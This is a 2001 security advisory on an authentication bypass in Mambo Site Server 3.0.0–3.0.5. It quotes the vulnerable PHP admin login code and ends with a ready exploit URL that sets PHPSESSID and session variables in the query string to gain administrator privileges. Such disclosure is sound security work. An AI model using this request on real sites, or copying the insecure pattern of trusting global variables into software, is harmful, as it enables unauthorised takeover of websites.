Serious security hole in Mambo Site Server version 3.0.X Jul, 24 2001 by: Ismael Peinado Palomo - postmaster@reverseonline.com www.reverseonline.com Summary Mambo Site Server is a dynamic portal engine and content management tool based on PHP and MySQL. Details Vulnerable systems: Mambo Site Server version 3.0.0 - 3.0.5 Immune systems: Impact: Any user can gain administrator privileges. Exploits: Under 'administrator/' dir. we found that index.php checks the user and password: if (isset($submit)){ $query = "SELECT id, password, name FROM users WHERE username='$myname' AND (usertype='administrator' OR usertype='superadministrator')"; $result = $database->openConnectionWithReturn($query); if (mysql_num_rows($result)!= 0){ list($userid, $dbpass, $fullname) = mysql_fetch_array($result); ..... if (strcmp($dbpass,$pass)) { //if the password entered does not match the database record ask user to login again print "\n"; }else { //if the password matches the database if ($remember!="on"){ //if the user does not want the password remembered and the cookie is set, delete the cookie if ($passwordcookie!=""){ setcookie("passwordcookie"); $passwordcookie=""; } } //set up the admin session then take the user into the admin section of the site session_register("myname"); session_register("fullname"); session_register("userid"); print "\n"; print "\n"; } }else { print "\n"; } as we can see if the password for administrator matches the one in the database, some variables are registered in the session and we are redirected to index2.php...so lets take a look at index2.php.... if (!$PHPSESSID){ print "\n"; exit(0); } else { session_start(); if (!$myname) session_register("myname"); if (!$fullname) session_register("fullname"); if (!$uid) session_register("userid"); } Here we can see the only verification of a valid user is through the global var. PHPSESSID, so if we declare that variable on the url, and set the 'myname','fullname' and 'userid' we can gain administrative control...so we'll test: http://target.machine/administrator/index2.php?PHPSESSID=1&myname=admin&fullname=admin&userid=administrator BINGO!! now we have full administrative privileges...that's a typical example of PHP hacking...it's clear that security can't rely on global variables since they may be modifyed through url parsing. Ismael Peinado Palomo Ingeniero Jefe I+D postmaster@reverseonline.com www.reverseonline.com